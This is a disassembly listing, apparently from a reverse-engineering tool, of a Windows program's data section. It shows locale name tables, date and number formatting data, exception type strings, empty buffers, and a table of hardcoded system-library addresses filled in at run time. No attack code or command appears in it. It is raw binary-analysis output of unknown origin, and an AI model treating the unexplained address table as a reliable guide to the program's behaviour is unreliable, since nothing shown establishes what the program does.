dd offset aBritain ; "britain"
dd 524247h
dd offset aChina ; "china"
dd offset byte_4E4843
dd offset aCzech ; "czech"
dd offset dword_455A38+0Bh
dd offset aEngland ; "england"
dd 524247h
dd offset aGreatBritain ; "great britain"
dd 524247h
dd offset aHolland ; "holland"
dd offset aIoctlsocket+0Ah
dd offset aHongKong ; "hong-kong"
dd offset dword_474B48
dd offset aNewZealand ; "new-zealand"
dd offset word_4C5A4E
dd offset aNz ; "nz"
dd offset word_4C5A4E
dd offset aPrChina_0 ; "pr china"
dd offset byte_4E4843
dd offset aPrChina ; "pr-china"
dd offset byte_4E4843
dd offset aPuertoRico ; "puerto-rico"
dd offset dword_495250
dd offset aSlovak ; "slovak"
dd offset byte_4B5653
dd offset aSouthAfrica_1 ; "south africa"
dd offset word_46415A
dd offset aSouthKorea_0 ; "south korea"
dd 524F4Bh
dd offset aSouthAfrica_0 ; "south-africa"
dd offset word_46415A
dd offset aSouthKorea ; "south-korea"
dd 524F4Bh
dd offset aTrinidadTobago ; "trinidad & tobago"
dd offset dword_4F5454
dd offset aUk ; "uk"
dd 524247h
dd offset aUnitedKingdom ; "united-kingdom"
dd 524247h
dd offset aUnitedStates ; "united-states"
dd 415355h
dd offset aUs ; "us"
dd 415355h
off_455D40 dd offset aAmerican ; DATA XREF: ___get_qualified_locale+67�o
; "american"
dd 554E45h
dd offset aAmericanEngl_0 ; "american english"
dd 554E45h
dd offset aAmericanEnglis ; "american-english"
dd 554E45h
dd offset aAustralian ; "australian"
dd 414E45h
dd offset aBelgian ; "belgian"
dd 424C4Eh
dd offset aCanadian ; "canadian"
dd 434E45h
dd offset aChh ; "chh"
dd offset word_48485A
dd offset aChi ; "chi"
dd offset word_49485A
dd offset aChinese ; "chinese"
dd 534843h
dd offset aChineseHongkon ; "chinese-hongkong"
dd offset word_48485A
dd offset aChineseSimplif ; "chinese-simplified"
dd 534843h
dd offset aChineseSingapo ; "chinese-singapore"
dd offset word_49485A
dd offset aChineseTraditi ; "chinese-traditional"
dd 544843h
dd offset aDutchBelgian ; "dutch-belgian"
dd 424C4Eh
dd offset aEnglishAmerica ; "english-american"
dd 554E45h
dd offset aEnglishAus ; "english-aus"
dd 414E45h
dd offset aEnglishBelize ; "english-belize"
dd offset byte_4C4E45
dd offset aEnglishCan ; "english-can"
dd 434E45h
dd offset aEnglishCaribbe ; "english-caribbean"
dd 424E45h
dd offset aEnglishIre ; "english-ire"
dd offset byte_494E45
dd offset aEnglishJamaica ; "english-jamaica"
dd offset byte_4A4E45
dd offset aEnglishNz ; "english-nz"
dd 5A4E45h
dd offset aEnglishSouthAf ; "english-south africa"
dd 534E45h
dd offset aEnglishTrinida ; "english-trinidad y tobago"
dd 544E45h
dd offset aEnglishUk ; "english-uk"
dd offset byte_474E45
dd offset aEnglishUs ; "english-us"
dd 554E45h
dd offset aEnglishUsa ; "english-usa"
dd 554E45h
dd offset aFrenchBelgian ; "french-belgian"
dd 425246h
dd offset aFrenchCanadian ; "french-canadian"
dd 435246h
dd offset aFrenchLuxembou ; "french-luxembourg"
dd offset word_4C5246
dd offset aFrenchSwiss ; "french-swiss"
dd 535246h
dd offset aGermanAustrian ; "german-austrian"
dd 414544h
dd offset aGermanLichtens ; "german-lichtenstein"
dd 434544h
dd offset aGermanLuxembou ; "german-luxembourg"
dd offset dword_4C4544
dd offset aGermanSwiss ; "german-swiss"
dd 534544h
dd offset aIrishEnglish ; "irish-english"
dd offset byte_494E45
dd offset aItalianSwiss ; "italian-swiss"
dd 535449h
dd offset aNorwegian ; "norwegian"
dd 524F4Eh
dd offset aNorwegianBokma ; "norwegian-bokmal"
dd 524F4Eh
dd offset aNorwegianNynor ; "norwegian-nynorsk"
dd offset word_4E4F4E
dd offset aPortugueseBraz ; "portuguese-brazilian"
dd 425450h
dd offset aSpanishArgenti ; "spanish-argentina"
dd 535345h
dd offset aSpanishBolivia ; "spanish-bolivia"
dd 425345h
dd offset aSpanishChile ; "spanish-chile"
dd offset byte_4C5345
dd offset aSpanishColombi ; "spanish-colombia"
dd offset byte_4F5345
dd offset aSpanishCostaRi ; "spanish-costa rica"
dd 435345h
dd offset aSpanishDominic ; "spanish-dominican republic"
dd offset aErrorGetting_0+5
dd offset aSpanishEcuador ; "spanish-ecuador"
dd offset byte_465345
dd offset aSpanishElSalva ; "spanish-el salvador"
dd offset off_455344+1
dd offset aSpanishGuatema ; "spanish-guatemala"
dd offset byte_475345
dd offset aSpanishHondura ; "spanish-honduras"
dd offset byte_485345
dd offset aSpanishMexican ; "spanish-mexican"
dd offset byte_4D5345
dd offset aSpanishModern ; "spanish-modern"
dd offset byte_4E5345
dd offset aSpanishNicarag ; "spanish-nicaragua"
dd offset byte_495345
dd offset aSpanishPanama ; "spanish-panama"
dd 415345h
dd offset aSpanishParagua ; "spanish-paraguay"
dd 5A5345h
dd offset aSpanishPeru ; "spanish-peru"
dd 525345h
dd offset aSpanishPuertoR ; "spanish-puerto rico"
dd 555345h
dd offset aSpanishUruguay ; "spanish-uruguay"
dd 595345h
dd offset aSpanishVenezue ; "spanish-venezuela"
dd 565345h
dd offset aSwedishFinland ; "swedish-finland"
dd offset byte_465653
dd offset aSwiss ; "swiss"
dd 534544h
dd offset aUk ; "uk"
dd offset byte_474E45
dd offset aUs ; "us"
dd 554E45h
dd offset aUsa ; "usa"
dd 554E45h
; void *off_455F48
off_455F48 dd offset off_455F50 ; DATA XREF: ___init_time+70�w
; ___init_time:loc_4348C1�w ...
align 10h
off_455F50 dd offset aSun ; DATA XREF: ___init_time:loc_4348C1�o
; .data:off_455F48�o
; "Sun"
dd offset aMon ; "Mon"
dd offset aTue ; "Tue"
dd offset aWed ; "Wed"
dd offset aThu ; "Thu"
dd offset aFri ; "Fri"
dd offset aSat ; "Sat"
dd offset aSunday ; "Sunday"
dd offset aMonday ; "Monday"
dd offset aTuesday ; "Tuesday"
dd offset aWednesday ; "Wednesday"
dd offset aThursday ; "Thursday"
dd offset aFriday ; "Friday"
dd offset aSaturday ; "Saturday"
dd offset aJan ; "Jan"
dd offset aFeb ; "Feb"
dd offset aMar ; "Mar"
dd offset aApr ; "Apr"
dd offset aMay ; "May"
dd offset aJun ; "Jun"
dd offset aJul ; "Jul"
dd offset aAug ; "Aug"
dd offset aSep ; "Sep"
dd offset aOct ; "Oct"
dd offset aNov ; "Nov"
dd offset aDec ; "Dec"
dd offset aJanuary ; "January"
dd offset aFebruary ; "February"
dd offset aMarch ; "March"
dd offset aApril ; "April"
dd offset aMay ; "May"
dd offset aJune ; "June"
dd offset aJuly ; "July"
dd offset aAugust ; "August"
dd offset aSeptember ; "September"
dd offset aOctober ; "October"
dd offset aNovember ; "November"
dd offset aDecember ; "December"
dd offset aAm_0 ; "AM"
dd offset aPm_2 ; "PM"
dd offset aMDYy ; "M/d/yy"
dd offset aDdddMmmmDdYyyy ; "dddd, MMMM dd, yyyy"
dd offset aHMmSs ; "H:mm:ss"
align 10h
dword_456000 dd 2Eh, 0 ; DATA XREF: ___init_numeric+EE�o
; .data:off_456008�o
off_456008 dd offset dword_456000 ; DATA XREF: ___init_monetary+D4�w
; ___init_monetary+F6�o ...
off_45600C dd offset dword_4F4B04 ; DATA XREF: ___init_monetary+E2�w
off_456010 dd offset dword_4F4B04 ; DATA XREF: ___init_monetary+F1�w
dd offset dword_4F4B04
dd offset dword_4F4B04
dd offset dword_4F4B04
dd offset dword_4F4B04
dd offset dword_4F4B04
dd offset dword_4F4B04
dd offset dword_4F4B04
dd 2 dup(7F7F7F7Fh)
off_456038 dd offset off_456008 ; DATA XREF: ___init_numeric:loc_435289�r
; ___init_numeric+F8�r ...
align 10h
dword_456040 dd 2 dup(0) ; DATA XREF: ___multtenpow12+6�o
dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
dd 400FC350h, 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_4561A0 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: ___multtenpow12+2A�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh, 0
off_456300 dd offset off_43F170 ; DATA XREF: .rdata:off_43F1B0�o
; .rdata:0043F2DC�o ...
align 8
a_?avexception@ db '.?AVexception@@',0
off_456318 dd offset off_43F170 ; DATA XREF: .rdata:off_43F1C8�o
; .rdata:0043F20C�o ...
align 10h
a_?avlogic_erro db '.?AVlogic_error@std@@',0
align 4
off_456338 dd offset off_43F170 ; DATA XREF: .rdata:off_43F218�o
; .rdata:0043F25C�o ...
align 10h
a_?avlength_err db '.?AVlength_error@std@@',0
align 4
off_456358 dd offset off_43F170 ; DATA XREF: .rdata:off_43F268�o
; .rdata:0043F2AC�o ...
align 10h
a_?avout_of_ran db '.?AVout_of_range@std@@',0
align 4
off_456378 dd offset off_43F170 ; DATA XREF: .rdata:off_43F2E8�o
; .rdata:0043F324�o
align 10h
a_?avtype_info@ db '.?AVtype_info@@',0
dd offset ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z ; __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *)
align 8
dword_456398 dd 2 dup(0) ; DATA XREF: sub_401317+C8�o
dword_4563A0 dd 2 dup(0) ; DATA XREF: sub_401317+62�o
; char dword_4563A8[]
dword_4563A8 dd 0 ; DATA XREF: WinMain(x,x,x,x)+38F�o
; sub_401CC7+AD4�o ...
dd 5 dup(0)
dword_4563C0 dd 0 ; DATA XREF: sub_401CC7+B30�r
; sub_415B7F+60�r
dd 2D9h dup(0)
dword_456F28 dd 0 ; DATA XREF: sub_401CC7+5FBC�r
; sub_401CC7+6091�r ...
dd 7Fh dup(0)
dword_457128 dd 0 ; DATA XREF: sub_40B78E+41�w
; sub_40B8C9+40�w ...
dword_45712C dd 0 ; DATA XREF: sub_40B78E+47�w
; sub_40B8C9+46�w ...
dword_457130 dd 0 ; DATA XREF: sub_40B78E+52�w
; sub_40B8C9+3A�r ...
dword_457134 dd 0 ; DATA XREF: sub_401317+C�r
; sub_4019E7+B9�w ...
dword_457138 dd 0 ; DATA XREF: sub_40B8C9+75�r
; sub_40BAAA+2A�w ...
dword_45713C dd 0 ; DATA XREF: WinMain(x,x,x,x)+3DE�w
; WinMain(x,x,x,x)+456�w ...
byte_457140 db 0 ; DATA XREF: sub_4019E7+91�o
; sub_401CC7+5F07�r ...
align 4
dd 0BFh dup(0)
db 0
byte_457441 db 3 dup(0) ; DATA XREF: .data:off_450724�o
dd 3345h dup(0)
db 2 dup(0)
word_46415A dw 0 ; DATA XREF: .data:00455AD4�o
; .data:00455CFC�o ...
dd 47Ah dup(0)
db 0
byte_465345 db 3 dup(0) ; DATA XREF: .data:00455BD4�o
; .data:00455EBC�o
dd 0C2h dup(0)
db 3 dup(0)
byte_465653 db 0 ; DATA XREF: .data:00455F24�o
dd 3D3Dh dup(0)
dword_474B48 dd 0BFh dup(0) ; DATA XREF: .data:00455CC4�o
db 0
byte_474E45 db 3 dup(0) ; DATA XREF: .data:00455E04�o
; .data:00455F34�o
dd 0FEh dup(0)
db 0
byte_475241 db 3 dup(0) ; DATA XREF: .data:00455BB0�o
dd 40h dup(0)
db 0
byte_475345 db 3 dup(0) ; DATA XREF: .data:004559F0�o
; .data:00455ECC�o
dd 3D44h dup(0)
db 2 dup(0)
word_48485A dw 0 ; DATA XREF: .data:00455D74�o
; .data:00455D8C�o
dd 2BAh dup(0)
db 0
byte_485345 db 3 dup(0) ; DATA XREF: .data:00455ED4�o
dd 3D44h dup(0)
db 2 dup(0)
word_49485A dw 0 ; DATA XREF: .data:00455D7C�o
; .data:00455D9C�o
dd 17Ah dup(0)
db 0
byte_494E45 db 3 dup(0) ; DATA XREF: .data:00455DDC�o
; .data:00455E5C�o
dd 0FEh dup(0)
db 3 dup(0)
byte_495243 db 0 ; DATA XREF: .data:00455A50�o
align 10h
dword_495250 dd 3Dh dup(0) ; DATA XREF: .data:00455CEC�o
db 0
byte_495345 db 3 dup(0) ; DATA XREF: .data:00455EEC�o
dd 3EBFh dup(0)
db 0
byte_4A4E45 db 3 dup(0) ; DATA XREF: .data:00455DE4�o
dd 40FFh dup(0)
db 0
byte_4B5245 db 3 dup(0) ; DATA XREF: .data:off_4508B8�o
dd 102h dup(0)
db 3 dup(0)
byte_4B5653 db 0 ; DATA XREF: .data:00455CF4�o
dd 3BBBh dup(0)
db 2 dup(0)
word_4C4542 dw 0 ; DATA XREF: .data:0045591C�o
dword_4C4544 dd 0BFh dup(0) ; DATA XREF: .data:00455E4C�o
db 3 dup(0)
byte_4C4843 db 0 ; DATA XREF: .data:00455C08�o
dd 180h dup(0)
db 0
byte_4C4E45 db 3 dup(0) ; DATA XREF: .data:00455DC4�o
dd 3Eh dup(0)
db 3 dup(0)
byte_4C4F43 db 0 ; DATA XREF: .data:00455B58�o
dd 0C0h dup(0)
db 2 dup(0)
word_4C5246 dw 0 ; DATA XREF: .data:00455A74�o
; .data:00455E2C�o
dd 3Fh dup(0)
db 0
byte_4C5345 db 3 dup(0) ; DATA XREF: .data:00455C00�o
; .data:00455E9C�o
db 0
byte_4C5349 db 3 dup(0) ; DATA XREF: .data:00455864�o
; .data:0045586C�o
dd 1C0h dup(0)
db 2 dup(0)
word_4C5A4E dw 0 ; DATA XREF: .data:00455CCC�o
; .data:00455CD4�o
dd 39C0h dup(0)
db 2 dup(0)
word_4D4152 dw 0 ; DATA XREF: .data:off_44FB00�o
dd 37Ch dup(0)
dword_4D4F44 dd 100h dup(0) ; DATA XREF: .data:00455B00�o
db 0
byte_4D5345 db 3 dup(0) ; DATA XREF: .data:004558E8�o
; .data:00455EDC�o
dd 3Fh dup(0)
db 3 dup(0)
byte_4D5447 db 0 ; DATA XREF: .data:004559F8�o
dd 3AB8h dup(0)
dword_4E3F28 dd 0D1FAh ; DATA XREF: sub_401317+FD�w
; sub_40B78E+13�o ...
dword_4E3F2C dd 1Ch ; DATA XREF: WinMain(x,x,x,x)+3D�w
; sub_401CC7:loc_4046C6�r ...
dword_4E3F30 dd 0 ; DATA XREF: WinMain(x,x,x,x):loc_4018F9�o
; char Dest[]
Dest db 80h dup(0) ; DATA XREF: WinMain(x,x,x,x)+495�o
; WinMain(x,x,x,x)+52F�o ...
; char byte_4E3FB4[]
byte_4E3FB4 db 40h dup(0) ; DATA XREF: WinMain(x,x,x,x)+4AB�o
; char byte_4E3FF4[]
byte_4E3FF4 db 90h dup(0) ; DATA XREF: WinMain(x,x,x,x)+4C2�o
dword_4E4084 dd 0 ; DATA XREF: WinMain(x,x,x,x)+4B6�w
; WinMain(x,x,x,x)+546�w ...
dword_4E4088 dd 0 ; DATA XREF: WinMain(x,x,x,x)+4D5�w
dd 3 dup(0)
dword_4E4098 dd 0 ; DATA XREF: WinMain(x,x,x,x)+13D�r
byte_4E409C db 0 ; DATA XREF: sub_401B4F+28�r
; sub_401B4F+30�o
align 10h
; char byte_4E40A0[]
byte_4E40A0 db 4 dup(0) ; DATA XREF: WinMain(x,x,x,x)+4C7�o
; WinMain(x,x,x,x)+552�o
; char byte_4E40A4
byte_4E40A4 db 0 ; DATA XREF: WinMain(x,x,x,x):loc_401983�r
; WinMain(x,x,x,x)+576�o
align 4
; char byte_4E40A8[]
byte_4E40A8 db 4 dup(0) ; DATA XREF: WinMain(x,x,x,x)+58C�o
; char byte_4E40AC[]
byte_4E40AC db 4 dup(0) ; DATA XREF: WinMain(x,x,x,x)+59E�o
dword_4E40B0 dd 0 ; DATA XREF: WinMain(x,x,x,x)+4E3�w
; WinMain(x,x,x,x)+4FA�r ...
dword_4E40B4 dd 0 ; DATA XREF: WinMain(x,x,x,x)+49A�w
; sub_401CC7+88D�r
dword_4E40B8 dd 0 ; DATA XREF: .data:00440268�o
dword_4E40BC dd 0 ; DATA XREF: WinMain(x,x,x,x)+24D�o
; char byte_4E40C0[]
byte_4E40C0 db 4 dup(0) ; DATA XREF: sub_401CC7+7EB8�o
dword_4E40C4 dd 0 ; DATA XREF: sub_401CC7+22FB�o
; char byte_4E40C8[]
byte_4E40C8 db 4 dup(0) ; DATA XREF: sub_401CC7+1EA6�o
; char byte_4E40CC[]
byte_4E40CC db 4 dup(0) ; DATA XREF: sub_401CC7+414A�o
; char byte_4E40D0[]
byte_4E40D0 db 4 dup(0) ; DATA XREF: sub_401CC7+429A�o
; char byte_4E40D4[]
byte_4E40D4 db 4 dup(0) ; DATA XREF: sub_401CC7+451F�o
; char byte_4E40D8[]
byte_4E40D8 db 4 dup(0) ; DATA XREF: sub_401CC7+5D2C�o
dword_4E40DC dd 77C72C6Bh ; DATA XREF: sub_409E0C+4A7�w
; sub_409E0C+4EB�r ...
dword_4E40E0 dd 77EBA994h ; DATA XREF: sub_409E0C+65�w
; sub_41A5C1+166�r
dword_4E40E4 dd 7622A3F4h ; DATA XREF: sub_409E0C+80B�w
; sub_409E0C+880�r ...
dword_4E40E8 dd 71C45229h ; DATA XREF: sub_409E0C+9D8�w
; sub_409E0C+A43�r ...
dword_4E40EC dd 71C24870h ; DATA XREF: sub_409E0C+98A�w
; sub_409E0C+A13�r ...
dword_4E40F0 dd 77C71BB0h ; DATA XREF: sub_409E0C+48D�w
; sub_409E0C+4DB�r ...
dword_4E40F4 dd 77D4808Bh ; DATA XREF: sub_409E0C+213�w
; sub_409E0C+234�r ...
dword_4E40F8 dd 71C4502Ch ; DATA XREF: sub_409E0C+9CB�w
; sub_409E0C+A3B�r ...
dword_4E40FC dd 77DE801Bh ; DATA XREF: sub_409E0C+372�w
; sub_409E0C+3C7�r ...
dword_4E4100 dd 77DDACABh ; DATA XREF: sub_409E0C+40F�w
; sub_41B964+11E�r
dword_4E4104 dd 77DE8075h ; DATA XREF: sub_409E0C+37F�w
; sub_409E0C+3CF�r ...
dword_4E4108 dd 77DD7496h ; DATA XREF: sub_409E0C+3C0�w
; sub_419B93+AD�r
dword_4E410C dd 71AB1B7Bh ; DATA XREF: sub_409E0C+55A�w
; sub_40FB88+115�r ...
dword_4E4110 dd 77E686CCh ; DATA XREF: sub_409E0C+72�w
; sub_409E0C+D2�r ...
dword_4E4114 dd 71C2498Bh ; DATA XREF: sub_409E0C+97D�w
; sub_409E0C+A06�r ...
dword_4E4118 dd 77DDAB2Fh ; DATA XREF: sub_409E0C+3A6�w
; sub_409E0C+3E7�r ...
dword_4E411C dd 7620E8C3h ; DATA XREF: sub_409E0C+859�w
; sub_409E0C+8AC�r ...
dword_4E4120 dd 77DD23D7h ; DATA XREF: sub_409E0C+2A5�w
; sub_409E0C+2F0�r ...
dword_4E4124 dd 76214750h ; DATA XREF: sub_409E0C+84C�w
; sub_409E0C+8A4�r ...
dword_4E4128 dd 77E6D75Bh ; DATA XREF: sub_409E0C+B3�w
; sub_40B9D6+16�o ...
dword_4E412C dd 7620BD61h ; DATA XREF: sub_409E0C+866�w
; sub_409E0C+8B4�r ...
dword_4E4130 dd 71AB60C9h ; DATA XREF: sub_409E0C+54D�w
; sub_409E0C+6D0�r ...
dword_4E4134 dd 77EBA6E9h ; DATA XREF: sub_409E0C+58�w
; sub_409E0C+CA�r ...
dword_4E4138 dd 76D62A58h ; DATA XREF: sub_409E0C+934�w
; sub_413D3D+11A�r
dword_4E413C dd 76F36EAAh ; DATA XREF: sub_401CC7:loc_4040DF�r
; sub_409E0C+A95�w ...
dword_4E4140 dd 77E802FCh ; DATA XREF: sub_409E0C+A6�w
; sub_409E0C+F2�r ...
dword_4E4144 dd 77C75455h ; DATA XREF: sub_409E0C+480�w
; sub_409E0C+4D3�r ...
dword_4E4148 dd 71AB12A7h ; DATA XREF: sub_409E0C+5F6�w
; sub_40C63B+20�r ...
dword_4E414C dd 71C574FAh ; DATA XREF: sub_409E0C+9BE�w
; sub_409E0C+A33�r ...
dword_4E4150 dd 71AB1746h ; DATA XREF: sub_409E0C+5E9�w
; sub_409E0C+754�r ...
dword_4E4154 dd 71C21CA3h ; DATA XREF: sub_409E0C+A0C�w
dword_4E4158 dd 71B28D0Dh ; DATA XREF: sub_409E0C+B50�w
dword_4E415C dd 762211EFh ; DATA XREF: sub_409E0C+7FE�w
; sub_409E0C+86D�r
dword_4E4160 dd 77D902E3h ; DATA XREF: sub_409E0C+1B3�w
; sub_41910C+15�r
dword_4E4164 dd 71C2FA86h ; DATA XREF: sub_409E0C+997�w
; sub_409E0C+A1B�r ...
dword_4E4168 dd 77DE1291h ; DATA XREF: sub_409E0C+38C�w
; sub_409E0C+3D7�r ...
dword_4E416C dd 77E2C1B3h ; DATA XREF: sub_409E0C+399�w
; sub_409E0C+3DF�r ...
dword_4E4170 dd 73B81E3Bh ; DATA XREF: sub_409E0C+C85�w
; sub_409E0C+C8C�r ...
dword_4E4174 dd 71ABF628h ; DATA XREF: sub_409E0C+6AC�w
; sub_411278+D0�r
dword_4E4178 dd 71AB1836h ; DATA XREF: sub_401317+1D�r
; sub_401317+23�r ...
dword_4E417C dd 77C72889h ; DATA XREF: sub_409E0C+4B4�w
; sub_415F56+207�r
dword_4E4180 dd 71C453F8h ; DATA XREF: sub_409E0C+9E5�w
; sub_409E0C+A4B�r ...
dword_4E4184 dd 77DD5C55h ; DATA XREF: sub_401000+51�r
; sub_409E0C+2B2�w ...
dword_4E4188 dd 77E96645h ; DATA XREF: sub_409E0C+7F�w
; sub_409E0C+DA�r ...
dword_4E418C dd 77428B97h ; DATA XREF: sub_401CC7+5A70�r
; sub_401CC7+7B1B�r ...
dword_4E4190 dd 71AB41DAh ; DATA XREF: WinMain(x,x,x,x)+8C�r
; sub_401CC7+5267�r ...
dword_4E4194 dd 762059A3h ; DATA XREF: sub_409E0C+825�w
; sub_409E0C+890�r ...
dword_4E4198 dd 71C4A1B4h ; DATA XREF: sub_409E0C+9A4�w
; sub_409E0C+A23�r
dword_4E419C dd 1F7CD214h ; DATA XREF: sub_409E0C+C0E�w
; sub_409E0C+C3F�r
dword_4E41A0 dd 77E09134h ; DATA XREF: sub_409E0C+2CC�w
; sub_4192B6+47�r
dword_4E41A4 dd 77D4456Bh ; DATA XREF: sub_409E0C+22D�w
; sub_4127AD+40�r ...
dword_4E41A8 dd 76D629BBh ; DATA XREF: sub_409E0C+91A�w
; sub_409E0C+92E�r ...
dword_4E41AC dd 1F7B9D96h ; DATA XREF: sub_409E0C+C28�w
dword_4E41B0 dd 77E09070h ; DATA XREF: sub_409E0C+2D9�w
; sub_4192B6+4F�r
dword_4E41B4 dd 71AB1740h ; DATA XREF: sub_409E0C+574�w
; sub_409E0C+6E8�r ...
dword_4E41B8 dd 7620AFB6h ; DATA XREF: sub_409E0C+83F�w
; sub_409E0C+873�r
dword_4E41BC dd 77D5C13Ah ; DATA XREF: sub_409E0C+220�w
; sub_409E0C+23C�r ...
dword_4E41C0 dd 77D45B19h ; DATA XREF: sub_409E0C+172�w
; sub_409E0C+1C2�r ...
dword_4E41C4 dd 71AB157Eh ; DATA XREF: sub_401CC7+1DE8�r
; sub_401CC7+5C29�r ...
dword_4E41C8 dd 71AB3E5Dh ; DATA XREF: sub_4019E7+C4�r
; sub_401CC7+52F1�r ...
dword_4E41CC dd 71AB14DCh ; DATA XREF: sub_409E0C+567�w
; sub_409E0C+6DC�r ...
dword_4E41D0 dd 0CC0004h ; DATA XREF: sub_409E0C+8DB�w
; sub_409E0C:loc_40A705�w ...
dword_4E41D4 dd 77DD590Bh ; DATA XREF: sub_401000+26�r
; sub_409E0C+28B�w ...
dword_4E41D8 dd 71ABD755h ; DATA XREF: sub_401CC7+7AA6�r
; sub_409E0C+69F�w ...
dword_4E41DC dd 77DF7311h ; DATA XREF: sub_409E0C+32D�w
; sub_409E0C+341�r ...
dword_4E41E0 dd 77DDA2AFh ; DATA XREF: sub_409E0C+3B3�w
; sub_409E0C+3EF�r ...
dword_4E41E4 dd 1F7CD927h ; DATA XREF: sub_409E0C+C01�w
; sub_409E0C+C37�r
dword_4E41E8 dd 76206853h ; DATA XREF: sub_409E0C+818�w
; sub_409E0C+888�r ...
dword_4E41EC dd 77D4932Ch ; DATA XREF: sub_409E0C+206�w
; sub_409E0C+227�r ...
dword_4E41F0 dd 77D5E310h ; DATA XREF: sub_409E0C+18C�w
; sub_409E0C+1D2�r ...
dword_4E41F4 dd 76206B7Fh ; DATA XREF: sub_409E0C+832�w
; sub_409E0C+898�r ...
dword_4E41F8 dd 71AB1444h ; DATA XREF: sub_409E0C+624�w
; sub_409E0C+774�r ...
dword_4E41FC dd 77DD189Ah ; DATA XREF: sub_401000+5A�r
; sub_409E0C+2BF�w ...
dword_4E4200 dd 71AB3F8Dh ; DATA XREF: sub_409E0C+66B�w
; sub_409E0C+79C�r ...
dword_4E4204 dd 77DD5D20h ; DATA XREF: sub_409E0C+320�w
; sub_409E0C+334�r ...
dword_4E4208 dd 71AB1890h ; DATA XREF: sub_409E0C+644�w
; sub_409E0C+784�r ...
dword_4E420C dd 77C76B34h ; DATA XREF: sub_409E0C+44C�w
; sub_409E0C+4AE�r ...
dword_4E4210 dd 77D5E38Ch ; DATA XREF: sub_409E0C+199�w
; sub_409E0C+1DA�r ...
dword_4E4214 dd 77DDA20Bh ; DATA XREF: sub_409E0C+365�w
; sub_409E0C+3BA�r ...
dword_4E4218 dd 76F36EEBh ; DATA XREF: sub_409E0C+AA2�w
dword_4E421C dd 71AB12A7h ; DATA XREF: sub_409E0C+5DC�w
; sub_409E0C+748�r ...
dword_4E4220 dd 71AB1746h ; DATA XREF: sub_4019E7+3E�r
; sub_401CC7+52A3�r ...
dword_4E4224 dd 77EBA595h ; DATA XREF: sub_409E0C+4B�w
; sub_409E0C+C2�r ...
dword_4E4228 dd 77C7531Dh ; DATA XREF: sub_409E0C+473�w
; sub_409E0C+4CB�r ...
dword_4E422C dd 77D4BDCAh ; DATA XREF: sub_409E0C+165�w
; sub_409E0C+1BA�r ...
dword_4E4230 dd 71C3516Ah ; DATA XREF: sub_409E0C+9FF�w
; sub_409E0C+A5B�r ...
dword_4E4234 dd 71AB32CAh ; DATA XREF: sub_409E0C+685�w
; sub_409E0C+7AC�r ...
dword_4E4238 dd 71AB5690h ; DATA XREF: sub_401B4F+D1�r
; sub_401CC7+5306�r ...
dword_4E423C dd 1F7CB8F8h ; DATA XREF: sub_409E0C+C1B�w
; sub_409E0C+C47�r
dword_4E4240 dd 77EBB1E7h ; DATA XREF: sub_409E0C+3E�w
; sub_409E0C+BA�r ...
dword_4E4244 dd 77DD59F0h ; DATA XREF: sub_401000+45�r
; sub_409E0C+298�w ...
dword_4E4248 dd 71AB5DE2h ; DATA XREF: sub_409E0C+651�w
; sub_409E0C+78C�r ...
dword_4E424C dd 71AB3ECEh ; DATA XREF: sub_409E0C+637�w
; sub_409E0C+77C�r ...
dword_4E4250 dd 73B81B0Fh ; DATA XREF: sub_401CC7+751A�r
; sub_409E0C+C92�w
dword_4E4254 dd 76204E4Dh ; DATA XREF: sub_409E0C+879�w
; sub_416F9A+4DC�r ...
